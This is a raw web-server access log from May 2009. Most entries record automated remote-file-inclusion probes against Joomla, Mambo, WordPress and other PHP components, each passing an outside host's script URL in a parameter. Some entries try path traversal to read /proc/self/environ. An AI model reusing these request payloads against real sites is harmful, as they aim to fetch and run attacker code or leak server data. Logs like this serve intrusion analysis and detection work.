58.227.193.198 - - [28/May/2009:08:32:54 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:32:54 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:32:54 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:34:10 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:34:10 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:34:10 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:08:34:10 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:38 -0500] "GET /logs/access_log.1234310400//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:38 -0500] "GET //?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:40 -0500] "GET /logs//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:49 -0500] "GET /logs/access_log.1234742400//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:49 -0500] "GET //?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:50 -0500] "GET /logs/access_log.1234310400//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:50 -0500] "GET /logs/access_log.1234742400//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:08:38:51 -0500] "GET /logs//?_zb_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
72.29.68.196 - - [28/May/2009:08:44:07 -0500] "GET //inc/tell_a_friend.inc.php?script_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.29.68.196 - - [28/May/2009:08:44:07 -0500] "GET /logs//inc/tell_a_friend.inc.php?script_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.29.68.196 - - [28/May/2009:08:44:07 -0500] "GET /logs/access_log.1241740800//inc/tell_a_friend.inc.php?script_root=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:28 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:28 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:28 -0500] "GET /logs/access_log.1239926400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:40 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:40 -0500] "GET /logs/access_log.1239926400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:08:46:40 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:49:32 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:49:32 -0500] "GET /logs/access_log.1242432000/components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:49:32 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:08:52:02 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:08:52:02 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
213.206.93.3 - - [28/May/2009:08:52:17 -0500] "GET /logs/index.php?option=com_mkpostman&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:08:52:17 -0500] "GET /index.php?option=com_mkpostman&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
65.55.106.120 - - [28/May/2009:08:53:08 -0500] "GET /logs/access_log.1120003200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.36 - - [28/May/2009:08:53:16 -0500] "GET /logs/access_log.1132012800 HTTP/1.1" 200 663 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.75.4.169 - - [28/May/2009:08:54:49 -0500] "GET /logs/index.php?option=com_mkpostman&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:08:54:49 -0500] "GET /index.php?option=com_mkpostman&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
121.173.130.41 - - [28/May/2009:08:57:08 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.173.130.41 - - [28/May/2009:08:57:08 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.173.130.41 - - [28/May/2009:08:57:08 -0500] "GET /logs/access_log.1242432000/components/com_simpleboard/image_upload.php?sbp=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
211.21.254.165 - - [28/May/2009:08:57:24 -0500] "GET //inc/tell_a_friend.inc.php?script_root=http://www.triton-friendlyclub.com/2009/idosiriys.txt???%0D? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.21.254.165 - - [28/May/2009:08:57:24 -0500] "GET /logs/access_log.1241740800//inc/tell_a_friend.inc.php?script_root=http://www.triton-friendlyclub.com/2009/idosiriys.txt???%0D? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.21.254.165 - - [28/May/2009:08:57:24 -0500] "GET /logs//inc/tell_a_friend.inc.php?script_root=http://www.triton-friendlyclub.com/2009/idosiriys.txt???%0D? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
74.208.111.178 - - [28/May/2009:08:58:59 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:08:58:59 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:08:59:05 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:08:59:05 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:09:02:12 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:09:02:13 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.122.72.93 - - [28/May/2009:09:03:23 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:09:03:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:09:03:23 -0500] "GET /logs/access_log.1242432000//include/admin.lib.inc.php?site_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:09:03:47 -0500] "GET /logs/access_log.1242172800//include/admin.lib.inc.php?site_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.188.218.41 - - [28/May/2009:09:04:06 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:04:07 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:04:09 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:04:09 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
66.249.65.36 - - [28/May/2009:09:04:11 -0500] "GET /logs/access_log.1132704000 HTTP/1.1" 200 593 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.100.220.126 - - [28/May/2009:09:07:48 -0500] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:09:07:49 -0500] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
89.108.85.158 - - [28/May/2009:09:08:02 -0500] "GET /logs//bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
89.108.85.158 - - [28/May/2009:09:08:03 -0500] "GET //bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
220.181.7.97 - - [28/May/2009:09:09:16 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [28/May/2009:09:09:48 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:09:48 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
203.151.233.72 - - [28/May/2009:09:09:48 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.137.131.138 - - [28/May/2009:09:09:50 -0500] "GET //bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://stptcellular.net/webalizer/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
200.137.131.138 - - [28/May/2009:09:09:50 -0500] "GET /logs//bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]=http://stptcellular.net/webalizer/test.txt??? HTTP/1.1" 404 307 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
203.151.233.72 - - [28/May/2009:09:10:08 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:09:14:51 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:09:14:51 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.65.36 - - [28/May/2009:09:16:01 -0500] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.219.99.129 - - [28/May/2009:09:16:58 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:09:16:58 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.100.220.126 - - [28/May/2009:09:17:59 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:09:17:59 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
210.188.218.41 - - [28/May/2009:09:18:11 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:18:11 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:18:18 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:18:19 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:18:21 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:18:21 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.100.220.126 - - [28/May/2009:09:18:26 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:09:18:27 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
210.188.218.248 - - [28/May/2009:09:18:39 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:18:39 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.212.165.114 - - [28/May/2009:09:19:32 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
67.212.165.114 - - [28/May/2009:09:19:33 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
67.212.165.114 - - [28/May/2009:09:19:51 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
67.212.165.114 - - [28/May/2009:09:19:51 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
216.119.103.12 - - [28/May/2009:09:20:20 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://thietbibaoho.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
216.119.103.12 - - [28/May/2009:09:20:20 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://thietbibaoho.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
67.212.165.114 - - [28/May/2009:09:20:29 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
67.212.165.114 - - [28/May/2009:09:20:29 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
193.231.42.152 - - [28/May/2009:09:21:13 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:09:21:13 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
210.188.218.41 - - [28/May/2009:09:22:07 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:22:07 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.100.220.126 - - [28/May/2009:09:23:01 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:09:23:02 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 351 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 346 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 346 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 351 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:09:23:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""XXXXXX"
65.55.208.141 - - [28/May/2009:09:23:57 -0500] "GET /logs/access_log.1108080000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [28/May/2009:09:23:57 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [28/May/2009:09:23:57 -0500] "GET /logs/access_log.1133136000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.188.218.248 - - [28/May/2009:09:24:03 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:24:03 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
193.231.42.152 - - [28/May/2009:09:24:06 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:09:24:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
66.219.99.129 - - [28/May/2009:09:24:47 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:09:24:47 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.100.220.126 - - [28/May/2009:09:25:46 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:09:25:46 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.85.63.226 - - [28/May/2009:09:25:49 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:09:25:49 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
207.213.245.215 - - [28/May/2009:09:26:38 -0500] "GET //errors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:09:26:38 -0500] "GET /logs//errors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.188.218.248 - - [28/May/2009:09:28:12 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:09:28:14 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:28:24 -0500] "GET /logs/errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:09:28:25 -0500] "GET /errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.26.219.92 - - [28/May/2009:09:28:57 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:09:28:57 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:09:28:57 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:09:29:03 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
211.233.22.209 - - [28/May/2009:09:29:09 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 191101 "-""libwww-perl/5.79"
211.233.22.209 - - [28/May/2009:09:29:09 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
85.214.53.125 - - [28/May/2009:09:30:26 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
85.214.53.125 - - [28/May/2009:09:30:26 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
